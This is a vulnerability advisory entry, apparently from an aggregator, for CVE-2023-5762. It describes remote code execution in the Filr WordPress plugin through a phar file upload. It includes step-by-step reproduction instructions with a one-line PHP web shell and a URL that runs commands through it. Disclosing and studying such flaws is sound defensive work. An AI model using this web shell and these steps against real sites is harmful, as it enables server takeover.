Lucene search
Dmtirii IgnatyevWPEX-ID:6AD99725-ECCC-4B61-BCE2-668B62619DEBHistoryNov 13, 2023 - 12:00 a.m.
Filr – Secure document library < 1.2.3.6 - Author+ RCE via file upload with phar ext
2023-11-1300:00:00
Dmtirii Ignatyev
26
filr
security
rce
vulnerability
file upload
exploit
wordpress
Description The plugin is vulnerable from an RCE (Remote Code Execution) vulnerability, which allows the operating system to execute commands and fully compromise the server on behalf of a user with Author-level privileges.
1) Go to main dashboard of plugin http://your_site/wordpress/wp-admin/edit.php?post_type=filr
2) Add new File
3) Upload file with extention "phar" and malicious code inside, like <?php system($_GET['cmd]'); ?>
4) Go to http://your_site/wordpress/wp-content/uploads/filr/{number_of_post}/cmd.phar?cmd=ps+aux (or pwd or id) and do RCERelated
cve
cve
CVE-2023-5762
2023-12-04 22:15:07
wpvulndb
wpvulndb
nvd
nvd
CVE-2023-5762
2023-12-04 22:15:07
prion
prion
Remote code execution
2023-12-04 22:15:00
cvelist
cvelist
7.8 High
AI Score
Confidence
High
0.001 Low
EPSS
Percentile
34.6%
Related for WPEX-ID:6AD99725-ECCC-4B61-BCE2-668B62619DEB